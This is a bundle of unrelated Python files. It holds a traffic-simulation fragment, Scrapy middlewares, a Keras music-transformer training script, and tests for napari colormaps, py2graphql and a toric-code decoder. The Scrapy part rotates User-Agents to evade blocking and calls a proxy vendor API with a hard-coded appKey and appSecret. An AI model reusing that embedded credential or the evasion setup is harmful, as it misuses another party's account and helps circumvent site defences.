    traci.simulationStep()
    # Calc qx continuously but only update control every h seconds
    if traci.simulation.getCurrentTime()%(1000*h) < 1e-3:
        for c in controllerList:
            c.process(qx)
    flowSteps[:, i%interval] = [traci.inductionloop.getSubscriptionResults(loop)[vehIDcode][0] for loop in flowLoops]
    qx = [len(np.unique(x[x!=''])) * scaling for x in flowSteps]
    i += 1

connector.disconnect()
print('DONE')
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
from scrapy.http import HtmlResponse
import time
import random
from scrapy.downloadermiddlewares.useragent import UserAgentMiddleware
import requests
import json
# Pool of desktop browser User-Agent strings; RandomUserAgent picks one
# at random per request to reduce fingerprinting/blocking.
user_agent_list = [
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 "
    "(KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
    "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 "
    "(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 "
    "(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 "
    "(KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 "
    "(KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 "
    "(KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
    "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 "
    "(KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 "
    "(KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 "
    "(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 "
    "(KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
]
class RandomUserAgent(UserAgentMiddleware):
    """Downloader middleware that attaches a random User-Agent per request.

    Enable it by adding this class to DOWNLOADER_MIDDLEWARES in settings.
    """
    def process_request(self, request, spider):
        # Only set the header if the request does not already carry one.
        request.headers.setdefault("User-Agent", random.choice(user_agent_list))
class CrawlDataSpiderMiddleware(object):
    """Spider middleware generated from the Scrapy project template; all hooks
    are the pass-through defaults."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the spider middleware does not modify the
    # passed objects.
    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s
    def process_spider_input(self, response, spider):
        # Called for each response that goes through the spider
        # middleware and into the spider.
        # Should return None or raise an exception.
        return None
    def process_spider_output(self, response, result, spider):
        # Called with the results returned from the Spider, after
        # it has processed the response.
        # Must return an iterable of Request, dict or Item objects.
        for i in result:
            yield i
    def process_spider_exception(self, response, exception, spider):
        # Called when a spider or process_spider_input() method
        # (from other spider middleware) raises an exception.
        # Should return either None or an iterable of Request, dict
        # or Item objects.
        pass
    def process_start_requests(self, start_requests, spider):
        # Called with the start requests of the spider, and works
        # similarly to the process_spider_output() method, except
        # that it doesn’t have a response associated.
        # Must return only requests (not items).
        for r in start_requests:
            yield r
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class CrawlDataDownloaderMiddleware(object):
    """Downloader middleware generated from the Scrapy project template; all
    hooks are the pass-through defaults."""
    # Not all methods need to be defined. If a method is not defined,
    # scrapy acts as if the downloader middleware does not modify the
    # passed objects.
    @classmethod
    def from_crawler(cls, crawler):
        # This method is used by Scrapy to create your spiders.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s
    def process_request(self, request, spider):
        # Called for each request that goes through the downloader
        # middleware.
        # Must either:
        # - return None: continue processing this request
        # - or return a Response object
        # - or return a Request object
        # - or raise IgnoreRequest: process_exception() methods of
        #   installed downloader middleware will be called
        return None
    def process_response(self, request, response, spider):
        # Called with the response returned from the downloader.
        # Must either;
        # - return a Response object
        # - return a Request object
        # - or raise IgnoreRequest
        return response
    def process_exception(self, request, exception, spider):
        # Called when a download handler or a process_request()
        # (from other downloader middleware) raises an exception.
        # Must either:
        # - return None: continue processing this exception
        # - return a Response object: stops process_exception() chain
        # - return a Request object: stops process_exception() chain
        pass
    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class SeleniumDownloaderMiddleware(object):
    """Downloader middleware with two roles:

    * attach a rotating HTTP proxy for the 'Central' and 'WangyiCaijing'
      spiders (on request and again on download errors);
    * render pages with the spider's Selenium browser for the 'Hubei' and
      'Tianjin' spiders.

    Changes vs. the original: the proxy-refresh logic that was duplicated in
    process_request and process_exception is factored into _ensure_proxy, the
    dead `use_proxy` local was removed, and the proxy-API call now has a
    timeout plus error handling so a hung/failing endpoint cannot stall or
    crash the crawl.
    """

    # Spiders that need an outbound proxy.
    PROXY_SPIDERS = ('Central', 'WangyiCaijing')
    # Spiders whose pages must be rendered by Selenium.
    SELENIUM_SPIDERS = ('Hubei', 'Tianjin')
    # Minimum seconds between proxy refreshes.
    PROXY_TTL = 10

    def __init__(self):
        self.lasttime = time.time()
        self.lastip = self.get_proxy()

    def _ensure_proxy(self, request):
        """Attach a (possibly refreshed) proxy URL to request.meta['proxy'].

        The cached proxy is reused within PROXY_TTL seconds; on a failed
        refresh the previous proxy is kept as a best effort.
        """
        now = time.time()
        if now - self.lasttime <= self.PROXY_TTL:
            ret_proxy = self.lastip
        else:
            ret_proxy = self.get_proxy()
            if len(ret_proxy) > 0:
                self.lastip = ret_proxy
                self.lasttime = now
            else:
                ret_proxy = self.lastip
        request.meta["proxy"] = ret_proxy
        print("为%s添加代理%s" % (request.url, ret_proxy), end="")

    def process_request(self, request, spider):
        # Only the proxy spiders need per-request handling here; for the
        # rest this hook is a no-op (returning None lets Scrapy continue).
        if spider.name in self.PROXY_SPIDERS:
            self._ensure_proxy(request)

    def process_response(self, request, response, spider):
        """Render JS-heavy pages with Selenium; pass everything else through."""
        if spider.name in self.SELENIUM_SPIDERS:
            spider.browser.get(url=request.url)
            row_response = spider.browser.page_source
            # Wrap the rendered DOM in an HtmlResponse so the spider parses
            # the post-JavaScript markup instead of the raw download.
            return HtmlResponse(url=spider.browser.current_url, body=row_response,
                                encoding="utf8", request=request)
        return response

    def process_exception(self, request, exception, spider):
        # Download failed (e.g. proxy died): refresh the proxy and retry.
        if spider.name in self.PROXY_SPIDERS:
            print("添加代理开始")
            self._ensure_proxy(request)
            return request
        return None

    def get_proxy(self):
        """Fetch one proxy ('http://ip:port') from the vendor API; '' on failure.

        NOTE(review): the appKey/appSecret are hard-coded in the URL -- move
        them to settings or environment variables.
        """
        url = "https://api.xiaoxiangdaili.com/ip/get?appKey=611007269433659392&appSecret=TZwG0Y1s&cnt=1&method=http&releaseAuto=false&wt=json"
        s = ''
        try:
            resp = requests.get(url, timeout=10)
        except requests.RequestException:
            return s
        if resp.status_code == 200:
            x = json.loads(resp.text)
            s = 'http://%s:%s' % (x['data'][0]['ip'], x['data'][0]['port'])
        return s
|
import os
from pathlib import Path
from tensorflow.keras.callbacks import ModelCheckpoint
from model_new import MusicTransformer
from custom.layers import *
from custom import callback
import params as par
from tensorflow.keras.optimizers import Adam
from data import DataNew
import utils
import argparse
import datetime
import sys
# NOTE(review): executing_eagerly() only *queries* eager mode and its return
# value is discarded here; it does not enable anything.
tf.executing_eagerly()

parser = argparse.ArgumentParser()
parser.add_argument('--l_r', default=None, help='학습률', type=float)
parser.add_argument('--batch_size', default=2, help='batch size', type=int)
parser.add_argument('--pickle_dir', default='music', help='데이터셋 경로')
parser.add_argument('--max_seq', default=2048, help='최대 길이', type=int)
parser.add_argument('--epochs', default=100, help='에폭 수', type=int)
parser.add_argument('--load_path', default=None, help='모델 로드 경로', type=str)
parser.add_argument('--save_path', default="result/dec0722", help='모델 저장 경로')
parser.add_argument('--is_reuse', default=False)
parser.add_argument('--multi_gpu', default=True)
parser.add_argument('--num_layers', default=1, type=int)
args = parser.parse_args()

# set arguments
l_r = args.l_r
batch_size = args.batch_size
pickle_dir = args.pickle_dir
max_seq = args.max_seq
epochs = args.epochs
is_reuse = args.is_reuse
load_path = args.load_path
save_path = args.save_path
multi_gpu = args.multi_gpu
num_layer = args.num_layers


def get_current_datetime():
    """Return the current local time formatted for use in file/dir names."""
    from datetime import datetime
    now = datetime.now()
    dt_name = now.strftime("%m_%d_%Y__%H_%M_%S")
    return dt_name


# Experiment configuration constants.
TEST_RUN = True
NORMALIZE_NOTES = True
USE_COMPUTED_VALUES = True
USE_SAVE_POINT = False
NORMALIZATION_BOUNDARIES = [3, 4]
EPOCHS = 250
LATENT_VECTOR_DIM = 2
BATCH_SIZE = 256
SEQUENCE_LENGTH = 32
FOLDER_ROOT = "."
COMPUTED_DATA_PATH = "AUTOENCODER/data/data_file_12_06_2021__19_53_42"
SAVE_POINT = "AUTOENCODER/checkpoints/08_19_2021__18_34_10/epoch=014-loss=383.5284-acc=0.0000.hdf5"
AUTOENCODER = "TRANSFORMER"
MODEL_NAME = AUTOENCODER
MODEL_FOLDER_ROOT = os.path.join(FOLDER_ROOT, MODEL_NAME)
CURR_DT = get_current_datetime()
# Output/input directory layout, all timestamped with CURR_DT.
MODEL_DIR_PATH = os.path.join(MODEL_FOLDER_ROOT, "generated_models")
OCCURENCES = os.path.join(MODEL_FOLDER_ROOT, "data", "occurences")
DATA_DIR = os.path.join(MODEL_FOLDER_ROOT, "data")
DATA_NOTES_DIR = os.path.join(DATA_DIR, "notes")
DATA_DURATIONS_DIR = os.path.join(DATA_DIR, "durations")
DATA_FILE_PATH = os.path.join(DATA_DIR, "data_file_" + str(CURR_DT))
DATA_DICTS_DIR = os.path.join(DATA_DIR, "dicts")
DATA_INT_TO_NOTE_PATH = os.path.join(DATA_DICTS_DIR, "int_to_note_" + str(CURR_DT))
DATA_INT_TO_DURATION_PATH = os.path.join(DATA_DICTS_DIR, "int_to_duration_" + str(CURR_DT))
DATA_NOTES_PATH = os.path.join(DATA_NOTES_DIR, "notes_" + str(CURR_DT))
DATA_DURATIONS_PATH = os.path.join(DATA_DURATIONS_DIR, "durations_" + str(CURR_DT))
MIDI_SONGS_DIR = os.path.join(FOLDER_ROOT, "midi_songs_smaller")
MIDI_GENERATED_DIR = os.path.join(MODEL_FOLDER_ROOT, "midi_generated")
MIDI_SONGS_REGEX = os.path.join(MIDI_SONGS_DIR, "*.mid")
CHECKPOINTS_DIR = os.path.join(MODEL_FOLDER_ROOT, "checkpoints")
CHECKPOINT = os.path.join(CHECKPOINTS_DIR, str(CURR_DT))
LOGS_DIR = os.path.join(MODEL_FOLDER_ROOT, "logs")
LOG = os.path.join(LOGS_DIR, str(CURR_DT))
all_paths = [MODEL_DIR_PATH, OCCURENCES, DATA_NOTES_DIR, DATA_DURATIONS_DIR, DATA_DICTS_DIR,
             MIDI_GENERATED_DIR, CHECKPOINTS_DIR, CHECKPOINT, LOGS_DIR, LOG]
for path in all_paths:
    Path(path).mkdir(parents=True, exist_ok=True)

# load data
dataset = DataNew('midi_processed', max_seq, batch_size)

# load model
curr_dt = get_current_datetime()
learning_rate = callback.CustomSchedule(par.embedding_dim) if l_r is None else l_r
opt = Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)

# NOTE(review): ':' in file names is invalid on Windows; consider '-' instead.
filepath = CHECKPOINT + str(curr_dt) + "/" + "epoch:{epoch:02d}-loss:{loss:.4f}"
# BUG FIX: 'loss' must be minimised; the original used mode='max', which made
# ModelCheckpoint keep the *worst* model seen so far.
checkpoint = ModelCheckpoint(
    filepath,
    monitor='loss',
    verbose=0,
    save_best_only=True,
    mode='min'
)
# BUG FIX: the original line ended with a trailing comma, which made `log` a
# 1-tuple, so callbacks_list contained a tuple instead of the TensorBoard
# callback (Keras rejects that at fit time).
log = tf.keras.callbacks.TensorBoard(log_dir=LOG + curr_dt)
callbacks_list = [checkpoint, log]

# define model
mt = MusicTransformer(
    embedding_dim=256,
    vocab_size=par.vocab_size,
    num_layer=num_layer,
    max_seq=max_seq,
    dropout=0.2,
    debug=False, loader_path=load_path)
mt.compile(optimizer=opt, loss=callback.transformer_dist_train_loss)
mt.run_eagerly = True
mt.fit(x=dataset.generators_dict["train"][0], y=dataset.generators_dict["train"][1], epochs=EPOCHS, callbacks=callbacks_list)

# define tensorboard writers for any manual summary logging
current_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S')
train_log_dir = 'logs/mt_decoder/'+current_time+'/train'
eval_log_dir = 'logs/mt_decoder/'+current_time+'/eval'
train_summary_writer = tf.summary.create_file_writer(train_log_dir)
eval_summary_writer = tf.summary.create_file_writer(eval_log_dir)
|
import numpy as np
import pytest
from napari.utils.colormaps import Colormap
def test_linear_colormap():
    """A colormap built from three colors defaults to linear interpolation."""
    rgba = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
    cmap = Colormap(rgba, name='testing')
    assert (cmap.name, cmap.interpolation) == ('testing', 'linear')
    assert len(cmap.controls) == len(rgba)
    np.testing.assert_almost_equal(cmap.colors, rgba)
    # 0.75 sits halfway between the last two colors.
    np.testing.assert_almost_equal(cmap.map([0.75]), [[0, 0.5, 0.5, 1]])
def test_linear_colormap_with_control_points():
    """Explicit control points shift where each color sits on [0, 1]."""
    rgba = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
    cmap = Colormap(rgba, name='testing', controls=[0, 0.75, 1])
    assert (cmap.name, cmap.interpolation) == ('testing', 'linear')
    assert len(cmap.controls) == len(rgba)
    np.testing.assert_almost_equal(cmap.colors, rgba)
    # 0.75 is exactly the middle control point, so we get the middle color.
    np.testing.assert_almost_equal(cmap.map([0.75]), [[0, 1, 0, 1]])
def test_non_ascending_control_points():
    """Control points that are not monotonically increasing are rejected."""
    rgba = np.array(
        [[0, 0, 0, 1], [0, 0.5, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    )
    with pytest.raises(ValueError):
        Colormap(rgba, name='testing', controls=[0, 0.75, 0.25, 1])
def test_wrong_number_control_points():
    """Four colors with only three control points must raise."""
    rgba = np.array(
        [[0, 0, 0, 1], [0, 0.5, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    )
    with pytest.raises(ValueError):
        Colormap(rgba, name='testing', controls=[0, 0.75, 1])
def test_wrong_start_control_point():
    """The first control point must be exactly 0."""
    color_list = [[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    with pytest.raises(ValueError):
        Colormap(np.array(color_list), name='testing', controls=[0.1, 0.75, 1])
def test_wrong_end_control_point():
    """The last control point must be exactly 1."""
    color_list = [[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    with pytest.raises(ValueError):
        Colormap(np.array(color_list), name='testing', controls=[0, 0.75, 0.9])
def test_binned_colormap():
    """interpolation='zero' yields stepwise (binned) colors."""
    color_list = [[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    cmap = Colormap(np.array(color_list), name='testing', interpolation='zero')
    assert cmap.name == 'testing'
    assert cmap.interpolation == 'zero'
    # Binned maps carry one more control point than colors (bin edges).
    assert len(cmap.controls) == len(color_list) + 1
    np.testing.assert_almost_equal(cmap.colors, color_list)
    np.testing.assert_almost_equal(cmap.map([0.4]), [[0, 1, 0, 1]])
def test_binned_colormap_with_control_points():
    """A binned colormap with explicit bin edges picks the enclosing bin."""
    color_list = [[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]]
    bin_edges = [0, 0.2, 0.3, 1]
    cmap = Colormap(
        np.array(color_list),
        name='testing',
        interpolation='zero',
        controls=bin_edges,
    )
    assert cmap.name == 'testing'
    assert cmap.interpolation == 'zero'
    assert len(cmap.controls) == len(color_list) + 1
    np.testing.assert_almost_equal(cmap.colors, color_list)
    # 0.4 falls inside the last bin [0.3, 1] -> third color.
    np.testing.assert_almost_equal(cmap.map([0.4]), [[0, 0, 1, 1]])
def test_colormap_equality():
    """Colormaps compare equal iff colors, name and controls all match."""
    colors = np.array([[0, 0, 0, 1], [0, 1, 0, 1], [0, 0, 1, 1]])
    first = Colormap(colors, name='testing', controls=[0, 0.75, 1])
    same = Colormap(colors, name='testing', controls=[0, 0.75, 1])
    different = Colormap(colors, name='testing', controls=[0, 0.25, 1])
    assert first == same
    assert first != different
|
import asyncio
import json
import unittest
from string import printable
from asynctest import CoroutineMock, patch
from graphql import parse
from hypothesis import given, strategies as st
import mock
from py2graphql import (
Aliased,
Client,
GraphQLEndpointError,
GraphQLError,
InfinityNotSupportedError,
Literal,
Query,
UnserializableTypeError,
ValuesRequiresArgumentsError,
)
from py2graphql.middleware import AddictMiddleware, AutoSubscriptingMiddleware
class Py2GraphqlTests(unittest.TestCase):
    """Unit tests for the py2graphql query builder and client.

    Covers GraphQL serialization of Python scalar/container values,
    query and mutation rendering, field aliasing, fetching over mocked
    HTTP (synchronous and asyncio), middleware behavior, error
    propagation, and property-based fuzzing of generated queries against
    the reference GraphQL parser.
    """

    def test_simple(self):
        # Default (pretty-printed) rendering of a query with arguments.
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", name="rome")
            .values("title", "url")
            .to_graphql(),
            'query {\n repository(owner: "juliuscaeser", name: "rome") {\n title\n url\n }\n}',
        )

    def test_boolean(self):
        # Python True serializes as GraphQL lowercase `true`.
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=True)
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: true) {title url}}',
        )

    def test_none(self):
        # Python None serializes as GraphQL `null`.
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=None)
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: null) {title url}}',
        )

    def test_literal(self):
        # Literal() emits its value unquoted (e.g. for enum arguments).
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", orderBy=Literal("age_ASC"))
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", orderBy: age_ASC) {title url}}',
        )

    def test_number(self):
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=10)
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: 10) {title url}}',
        )

    def test_float(self):
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=10.0)
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: 10.0) {title url}}',
        )

    def test_list(self):
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=[])
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: []) {title url}}',
        )

    def test_dict(self):
        # Dicts serialize as GraphQL input objects (unquoted keys).
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test={"a": 1})
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: {a: 1}) {title url}}',
        )

    def test_function(self):
        # A non-serializable argument (a function) must raise.
        try:
            Query().repository(owner="juliuscaeser", test=lambda: "").values(
                "title", "url"
            ).to_graphql(indentation=0)
        except UnserializableTypeError:
            pass
        else:
            raise Exception

    def test_list_with_contents(self):
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=[1])
            .values("title", "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: [1]) {title url}}',
        )

    def test_mutation_boolean(self):
        # operation_type switches the top-level keyword to `mutation`.
        self.assertEqual(
            Query(operation_type="mutation")
            .repository(owner="juliuscaeser", isAdmin=True)
            .values("title", "url")
            .to_graphql(indentation=0),
            'mutation {repository(owner: "juliuscaeser", isAdmin: true) {title url}}',
        )

    def test_alias(self):
        # Aliased(field, alias) renders as `alias: field`.
        self.assertEqual(
            Query()
            .repository(owner="juliuscaeser", test=True)
            .values(Aliased("title", "xxx"), "url")
            .to_graphql(indentation=0),
            'query {repository(owner: "juliuscaeser", test: true) {xxx: title url}}',
        )

    def test_empty_values(self):
        # .values() with no arguments is a usage error.
        try:
            self.assertEqual(
                Query()
                .repository(owner="juliuscaeser", isAdmin=True)
                .values()
                .to_graphql(indentation=0),
                'query {repository(owner: "juliuscaeser", isAdmin: true) {title url}}',
            )
        except ValuesRequiresArgumentsError:
            pass
        else:
            assert False

    def test_subscripting_query_fetches(self):
        # Minimal stand-in for a requests.Response object.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 200
            r.content = json.dumps(
                {"data": {"repository": {"title": "xxx", "url": "example.com"}}}
            )
            return r

        # Subscripting the query triggers an implicit fetch.
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            self.assertEqual(
                Query(
                    client=Client(
                        "http://example.com", {}, middleware=[AddictMiddleware]
                    )
                )
                .repository(owner="juliuscaeser", test=10)
                .values("title", "url")["repository"],
                {"title": "xxx", "url": "example.com"},
            )

    def test_fetch_async(self):
        # fetch_async() should await an aiohttp POST and parse the JSON body.
        async def task():
            with patch("aiohttp.ClientSession.post") as mocked:
                mocked.return_value.__aenter__.return_value.status = 200
                mocked.return_value.__aenter__.return_value.text = CoroutineMock(
                    return_value=json.dumps(
                        {"data": {"repository": {"title": "xxx", "url": "example.com"}}}
                    )
                )
                result = (
                    await Query(client=Client("http://example.com", {}))
                    .repository(owner="juliuscaeser", test=10)
                    .values("title", "url")
                    .fetch_async()
                )
                self.assertEqual(
                    result, {"repository": {"title": "xxx", "url": "example.com"}}
                )
        loop = asyncio.new_event_loop()
        loop.run_until_complete(task())
        loop.close()

    def test_fetch_async_retry(self):
        # First attempt raises; the client is expected to retry and succeed.
        async def task():
            class ReturnValue:
                pass
            with patch("aiohttp.ClientSession.post") as mocked:
                ret = ReturnValue
                ret.status = 200
                ret.text = CoroutineMock(
                    return_value=json.dumps(
                        {"data": {"repository": {"title": "xxx", "url": "example.com"}}}
                    )
                )
                mocked.return_value.__aenter__.side_effect = [Exception(), ret]
                result = (
                    await Query(client=Client("http://example.com", {}))
                    .repository(owner="juliuscaeser", test=10)
                    .values("title", "url")
                    .fetch_async()
                )
                self.assertEqual(
                    result, {"repository": {"title": "xxx", "url": "example.com"}}
                )
        loop = asyncio.new_event_loop()
        loop.run_until_complete(task())
        loop.close()

    def test_auto_subscript(self):
        # AutoSubscriptingMiddleware unwraps the single top-level key.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 200
            r.content = json.dumps(
                {"data": {"repository": {"title": "xxx", "url": "example.com"}}}
            )
            return r
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            self.assertEqual(
                Query(
                    client=Client(
                        "http://example.com",
                        {},
                        middleware=[AutoSubscriptingMiddleware],
                    )
                )
                .repository(owner="juliuscaeser", test=10)
                .values("title", "url")
                .fetch(),
                {"title": "xxx", "url": "example.com"},
            )

    def test_auto_subscript_iteration(self):
        # Iterating a query result should walk the unwrapped list.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 200
            r.content = json.dumps(
                {"data": {"repos": [{"title": "xxx", "url": "example.com"}]}}
            )
            return r
        client = Client(
            "http://example.com", {}, middleware=[AutoSubscriptingMiddleware]
        )
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            for x in (
                Query(client=client)
                .repos(owner="juliuscaeser", test=10)
                .values("title", "url")
            ):
                self.assertEqual(x["title"], "xxx")

    def test_iteration(self):
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 200
            r.content = json.dumps(
                {"data": {"repos": [{"title": "xxx", "url": "example.com"}]}}
            )
            return r
        client = Client("http://example.com", {})
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            for x in (
                Query(client=client)
                .repos(owner="juliuscaeser", test=10)
                .values("title", "url")["repos"]
            ):
                self.assertEqual(x["title"], "xxx")

    def test_syntax_error_response(self):
        # A 200 response carrying a GraphQL "errors" payload raises
        # GraphQLError with the parsed response attached.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 200
            r.content = json.dumps(
                {
                    "errors": [
                        {
                            "message": 'Syntax Error GraphQL (2:18) Unexpected Name "null"\n',
                            "locations": [{"line": 2, "column": 18}],
                        }
                    ]
                }
            )
            return r
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            try:
                Query(client=Client("http://example.com", {})).repository(
                    owner=None, test=10
                ).values("title", "url").fetch()
            except GraphQLError as e:
                self.assertEqual(
                    e.response,
                    {
                        "errors": [
                            {
                                "locations": [{"column": 18, "line": 2}],
                                "message": 'Syntax Error GraphQL (2:18) Unexpected Name "null"\n',
                            }
                        ]
                    },
                )
            else:
                assert False

    def test_raise_exceptions(self):
        # Non-200 HTTP status raises GraphQLEndpointError with raw body.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 400
            r.content = json.dumps({"errors": {"repository": "xxx"}})
            return r
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            try:
                Query(client=Client("http://example.com", {})).repository(
                    owner="juliuscaeser", test=10
                ).values("title", "url")["repository"]
            except GraphQLEndpointError as e:
                self.assertEqual(e.response, '{"errors": {"repository": "xxx"}}')
            else:
                assert False

    def test_raise_endpoint_exceptions(self):
        # Non-JSON error bodies are surfaced verbatim with the status code.
        class FakeResponse:
            pass

        def fake_request(url, body, headers, **kwargs):
            r = FakeResponse()
            r.status_code = 400
            r.content = "blahblah"
            return r
        http_mock = mock.Mock(side_effect=fake_request)
        with mock.patch("requests.post", http_mock):
            try:
                Query(client=Client("http://example.com", {})).repository(
                    owner="juliuscaeser", test=10
                ).values("title", "url")["repository"]
            except GraphQLEndpointError as e:
                self.assertEqual(e.response, "blahblah")
                self.assertEqual(e.status_code, 400)
            else:
                assert False

    # Property-based tests: whatever arguments we serialize, the rendered
    # query must remain parseable by the reference GraphQL parser.
    @given(st.fixed_dictionaries({"xxx": st.text(printable)}))
    def test_fuzz(self, data):
        query = (
            Query(client=Client("http://example.com", {}))
            .repository(**data)
            .values("id")
        )
        parse(str(query))

    @given(st.fixed_dictionaries({"xxx": st.floats(allow_infinity=True)}))
    def test_fuzz_floats(self, data):
        # Infinity has no GraphQL literal; the library raises instead.
        query = (
            Query(client=Client("http://example.com", {}))
            .repository(**data)
            .values("id")
        )
        try:
            parse(str(query))
        except InfinityNotSupportedError:
            pass

    @given(st.fixed_dictionaries({"xxx": st.integers()}))
    def test_fuzz_integers(self, data):
        query = (
            Query(client=Client("http://example.com", {}))
            .repository(**data)
            .values("id")
        )
        parse(str(query))

    @given(st.fixed_dictionaries({"xxx": st.lists(st.text(printable))}))
    def test_fuzz_lists(self, data):
        query = (
            Query(client=Client("http://example.com", {}))
            .repository(**data)
            .values("id")
        )
        parse(str(query))
if __name__ == "__main__":
    # Allow running this test module directly from the command line.
    unittest.main()
|
import itertools
import pytest
import numpy as np
from panqec.bpauli import bcommute, bsf_wt
from panqec.codes import Toric3DCode
from panqec.decoders import Toric3DMatchingDecoder
from panqec.error_models import PauliErrorModel
class TestToric3DMatchingDecoder:
    """Tests for the matching decoder on the 3D toric code.

    NOTE(review): the tests assert that X errors are corrected while a
    pure Z error yields a trivial correction, so this decoder appears to
    handle X-type errors only -- confirm against the decoder docs.
    """

    @pytest.fixture
    def code(self):
        # Asymmetric lattice dimensions so axis mix-ups would surface.
        return Toric3DCode(3, 4, 5)

    @pytest.fixture
    def decoder(self, code):
        # Depolarizing noise: equal X/Y/Z probabilities at 10% error rate.
        error_model = PauliErrorModel(1/3, 1/3, 1/3)
        error_rate = 0.1
        return Toric3DMatchingDecoder(code, error_model, error_rate)

    def test_decoder_has_required_attributes(self, decoder):
        assert decoder.label is not None
        assert decoder.decode is not None

